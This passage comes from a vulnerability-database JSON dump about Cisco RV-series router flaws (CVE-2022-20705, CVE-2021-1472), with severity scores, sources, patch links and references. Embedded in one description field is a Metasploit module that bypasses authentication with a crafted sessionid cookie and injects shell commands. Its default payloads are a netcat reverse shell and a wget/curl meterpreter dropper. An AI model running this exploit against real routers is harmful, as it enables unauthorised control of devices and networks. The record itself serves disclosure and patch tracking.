                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory. plural Cisco Small Business RV series router Exists in an out-of-bounds write vulnerability.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of Cisco RV340 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the NGINX web server. When parsing the sessionid cookie, the process does not properly validate a user-supplied path prior to using it in file operations. An attacker can leverage this vulnerability to bypass authentication on the system. \n          This access can then be used to pivot to other parts of the network. This module works on firmware\n          versions 1.0.03.24 and below. \n        },\n        \u0027License\u0027 =\u003e MSF_LICENSE,\n        \u0027Platform\u0027 =\u003e [\u0027linux\u0027, \u0027unix\u0027],\n        \u0027Author\u0027 =\u003e [\n          \u0027Biem Pham\u0027,  # Vulnerability Discoveries\n          \u0027Neterum\u0027,    # Metasploit Module\n          \u0027jbaines-r7\u0027  # Inspired from cisco_rv_series_authbypass_and_rce.rb\n        ],\n        \u0027DisclosureDate\u0027 =\u003e \u00272021-11-02\u0027,\n        \u0027Arch\u0027 =\u003e [ARCH_CMD, ARCH_ARMLE],\n        \u0027References\u0027 =\u003e [\n          [\u0027CVE\u0027, \u00272022-20705\u0027], # Authentication Bypass\n          [\u0027CVE\u0027, \u00272022-20707\u0027], # Command Injection\n          [\u0027ZDI\u0027, \u002722-410\u0027], # Authentication Bypass\n          [\u0027ZDI\u0027, \u002722-411\u0027]  # Command Injection\n        ],\n        \u0027Targets\u0027 =\u003e [\n          [\n            \u0027Unix Command\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027unix\u0027,\n              \u0027Arch\u0027 =\u003e ARCH_CMD,\n              \u0027Type\u0027 =\u003e :unix_cmd,\n              \u0027Payload\u0027 =\u003e {\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027#\u0027\n              },\n              \u0027DefaultOptions\u0027 =\u003e {\n                \u0027PAYLOAD\u0027 =\u003e \u0027cmd/unix/reverse_netcat\u0027\n              }\n            }\n          ],\n          [\n            \u0027Linux Dropper\u0027,\n            {\n              \u0027Platform\u0027 =\u003e \u0027linux\u0027,\n              \u0027Arch\u0027 =\u003e [ARCH_ARMLE],\n              \u0027Type\u0027 =\u003e :linux_dropper,\n              \u0027Payload\u0027 =\u003e {\n                \u0027BadChars\u0027 =\u003e \u0027\\\u0027#\u0027\n              },\n              \u0027CmdStagerFlavor\u0027 =\u003e [ \u0027wget\u0027, \u0027curl\u0027 ],\n              \u0027DefaultOptions\u0027 =\u003e {\n                \u0027PAYLOAD\u0027 =\u003e \u0027linux/armle/meterpreter/reverse_tcp\u0027\n              }\n            }\n          ]\n        ],\n        \u0027DefaultTarget\u0027 =\u003e 0,\n        \u0027DefaultOptions\u0027 =\u003e {\n          \u0027RPORT\u0027 =\u003e 443,\n          \u0027SSL\u0027 =\u003e true,\n          \u0027MeterpreterTryToFork\u0027 =\u003e true\n        },\n        \u0027Notes\u0027 =\u003e {\n          \u0027Stability\u0027 =\u003e [CRASH_SAFE],\n          \u0027Reliability\u0027 =\u003e [REPEATABLE_SESSION],\n          \u0027SideEffects\u0027 =\u003e [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n        }\n      )\n    )\n    register_options(\n      [\n        OptString.new(\u0027TARGETURI\u0027, [true, \u0027Base path\u0027, \u0027/\u0027])\n      ]\n    )\n  end\n\n  # sessionid utilized later needs to be set to length\n  # of 16 or exploit will fail. Tested with lengths\n  # 14-17\n  def generate_session_id\n    return Rex::Text.rand_text_alphanumeric(16)\n  end\n\n  def check\n    res = send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027GET\u0027,\n      \u0027uri\u0027 =\u003e \u0027/upload\u0027,\n      \u0027headers\u0027 =\u003e {\n        \u0027Cookie\u0027 =\u003e \u0027sessionid =../../www/index.html; sessionid=\u0027 + generate_session_id\n      }\n    }, 10)\n\n    # A proper \"upload\" will trigger file creation. So the send_request_cgi call\n    # above is an incorrect \"upload\" call to avoid creating a file on disk. The router will return\n    # status code 405 Not Allowed if authentication has been bypassed by the above request. \n    # The firmware containing this authentication bypass also contains the command injection\n    # vulnerability that will be abused during actual exploitation. Non-vulnerable\n    # firmware versions will respond with 403 Forbidden. \n    if res.nil?\n      return CheckCode::Unknown(\u0027The device did not respond to request packet.\u0027)\n    elsif res.code == 405\n      return CheckCode::Appears(\u0027The device is vulnerable to authentication bypass. Likely also vulnerable to command injection.\u0027)\n    elsif res.code == 403\n      return CheckCode::Safe(\u0027The device is not vulnerable to exploitation.\u0027)\n    else # Catch-all\n      return CheckCode::Unknown(\u0027The target responded in an unexpected way. Exploitation is unlikely.\u0027)\n    end\n  end\n\n  def execute_command(cmd, _opts = {})\n    res = send_exploit(cmd)\n\n    # Successful unix_cmd shells should not produce a response. \n    # However if a response is returned, check the status code and return\n    # Failure::NotVulnerable if it is 403 Forbidden. \n    if target[\u0027Type\u0027] == :unix_cmd \u0026\u0026 res\u0026.code == 403\n      fail_with(Failure::NotVulnerable, \u0027The target responded with 403 Forbidden and is not vulnerable\u0027)\n    end\n\n    if target[\u0027Type\u0027] == :linux_dropper\n      fail_with(Failure::Unreachable, \u0027The target did not respond\u0027) unless res\n      fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a 200 OK\u0027) unless res\u0026.code == 200\n      begin\n        body_json = res.get_json_document\n        fail_with(Failure::UnexpectedReply, \u0027The target did not respond with a JSON body\u0027) unless body_json\n      rescue JSON::ParserError =\u003e e\n        print_error(\"Failed: #{e.class} - #{e.message}\")\n        fail_with(Failure::UnexpectedReply, \u0027Failed to parse the response returned from the server! Its possible the response may not be JSON!\u0027)\n      end\n    end\n\n    print_good(\u0027Exploit successfully executed.\u0027)\n  end\n\n  def send_exploit(cmd)\n    filename = Rex::Text.rand_text_alphanumeric(5..12)\n    fileparam = Rex::Text.rand_text_alphanumeric(5..12)\n    input = Rex::Text.rand_text_alphanumeric(5..12)\n\n    # sessionid utilized later needs to be set to length\n    # of 16 or exploit will fail. Tested with lengths\n    # 14-17\n    sessionid = Rex::Text.rand_text_alphanumeric(16)\n\n    filepath = \u0027/tmp/upload.input\u0027 # This file must exist and be writeable by www-data so we just use the temporary upload file to prevent issues. \n    pathparam = \u0027Configuration\u0027\n\n    destination = \"\u0027; \" + cmd + \u0027 #\u0027\n\n    multipart_form = Rex::MIME::Message.new\n    multipart_form.add_part(filepath, nil, nil, \u0027form-data; name=\"file.path\"\u0027)\n    multipart_form.add_part(filename, nil, nil, \u0027form-data; name=\"filename\"\u0027)\n    multipart_form.add_part(pathparam, nil, nil, \u0027form-data; name=\"pathparam\"\u0027)\n    multipart_form.add_part(fileparam, nil, nil, \u0027form-data; name=\"fileparam\"\u0027)\n    multipart_form.add_part(destination, nil, nil, \u0027form-data; name=\"destination\"\u0027)\n    multipart_form.add_part(input, \u0027application/octet-stream\u0027, nil, format(\u0027form-data; name=\"input\"; filename=\"%\u003cfilename\u003es\"\u0027, filename: filename))\n\n    # Escaping \"/tmp/upload/\" folder that does not contain any other permanent files\n    send_request_cgi({\n      \u0027method\u0027 =\u003e \u0027POST\u0027,\n      \u0027uri\u0027 =\u003e \u0027/upload\u0027,\n      \u0027ctype\u0027 =\u003e \"multipart/form-data; boundary=#{multipart_form.bound}\",\n      \u0027headers\u0027 =\u003e {\n        \u0027Cookie\u0027 =\u003e \u0027sessionid =../../www/index.html; sessionid=\u0027 + sessionid\n      },\n      \u0027data\u0027 =\u003e multipart_form.to_s\n    }, 10)\n  end\n\n  def exploit\n    print_status(\"Executing #{target.name} for #{datastore[\u0027PAYLOAD\u0027]}\")\n    case target[\u0027Type\u0027]\n    when :unix_cmd\n      execute_command(payload.encoded)\n    when :linux_dropper\n      execute_cmdstager(linemax: 120)\n    end\n  end\nend\n",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "PACKETSTORM",
            "id": "170988"
          }
        ],
        "trust": 3.69
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20705",
            "trust": 5.5
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-415",
            "trust": 2.4
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410",
            "trust": 2.4
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409",
            "trust": 2.4
          },
          {
            "db": "PACKETSTORM",
            "id": "170988",
            "trust": 1.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15848",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15882",
            "trust": 0.7
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15610",
            "trust": 0.7
          },
          {
            "db": "CS-HELP",
            "id": "SB2022020301",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "PACKETSTORM",
            "id": "170988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "id": "VAR-202202-0325",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T22:04:59.212000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 2.1,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "cisco-sa-smb-mult-vuln-KA9PK6D",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "Cisco Small Business Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://123.124.177.30/web/xxk/bdxqById.tag?id=182405"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-smb-mult-vuln-KA9PK6D"
          },
          {
            "title": "https://github.com/20142995/Goby",
            "trust": 0.1,
            "url": "https://github.com/20142995/Goby "
          },
          {
            "title": "Goby_POC\nPOC \u6570\u91cf1319",
            "trust": 0.1,
            "url": "https://github.com/Z0fhack/Goby_POC "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-23305 "
          },
          {
            "title": "CVE-2022-XXXX",
            "trust": 0.1,
            "url": "https://github.com/AlphabugX/CVE-2022-RCE "
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-787",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-121",
            "trust": 1.0
          },
          {
            "problemtype": "Out-of-bounds writing (CWE-787) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 3.8,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-smb-mult-vuln-ka9pk6d"
          },
          {
            "trust": 2.3,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-415/"
          },
          {
            "trust": 1.8,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-410/"
          },
          {
            "trust": 1.8,
            "url": "http://packetstormsecurity.com/files/170988/cisco-rv-series-authentication-bypass-command-injection.html"
          },
          {
            "trust": 1.7,
            "url": "https://www.zerodayinitiative.com/advisories/zdi-22-409/"
          },
          {
            "trust": 1.5,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20705"
          },
          {
            "trust": 0.6,
            "url": "https://www.cybersecurity-help.cz/vdb/sb2022020301"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/787.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv340_lan/"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20707"
          },
          {
            "trust": 0.1,
            "url": "https://metasploit.com/download"
          },
          {
            "trust": 0.1,
            "url": "https://github.com/rapid7/metasploit-framework"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "PACKETSTORM",
            "id": "170988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "db": "PACKETSTORM",
            "id": "170988"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "date": "2022-02-10T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "date": "2023-04-12T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "date": "2023-02-14T15:32:53",
            "db": "PACKETSTORM",
            "id": "170988"
          },
          {
            "date": "2022-02-03T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "date": "2022-02-10T18:15:09.307000",
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-415"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-410"
          },
          {
            "date": "2022-02-22T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-409"
          },
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2022-20705"
          },
          {
            "date": "2023-04-12T07:15:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          },
          {
            "date": "2023-02-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          },
          {
            "date": "2024-11-21T06:43:22.260000",
            "db": "NVD",
            "id": "CVE-2022-20705"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "plural \u00a0Cisco\u00a0Small\u00a0Business\u00a0RV\u00a0 series router \u00a0 Out-of-bounds write vulnerability in",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-004459"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "buffer error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202202-166"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202104-0893

    Vulnerability from variot - Updated: 2024-11-23 21:58

    Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory

    Show details on source website

    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202104-0893",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv260p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv160",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv340",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.21"
          },
          {
            "model": "rv340w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.21"
          },
          {
            "model": "rv160w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv260w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv345p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.21"
          },
          {
            "model": "rv345",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.21"
          },
          {
            "model": "rv260",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.03"
          },
          {
            "model": "rv260w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p dual wan gigabit poe vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w dual wan gigabit wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160 vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn router with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345 dual wan gigabit vpn router",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "T Shiomitsu",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          }
        ],
        "trust": 0.6
      },
      "cve": "CVE-2021-1472",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "PARTIAL",
                "baseScore": 7.5,
                "confidentialityImpact": "PARTIAL",
                "exploitabilityScore": 10.0,
                "id": "CVE-2021-1472",
                "impactScore": 6.4,
                "integrityImpact": "PARTIAL",
                "severity": "HIGH",
                "trust": 1.9,
                "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 9.8,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-1472",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "NONE",
                "baseScore": 5.3,
                "baseSeverity": "MEDIUM",
                "confidentialityImpact": "NONE",
                "exploitabilityScore": 3.9,
                "id": "CVE-2021-1472",
                "impactScore": 1.4,
                "integrityImpact": "LOW",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-1472",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1472",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1472",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1472",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-433",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1472",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
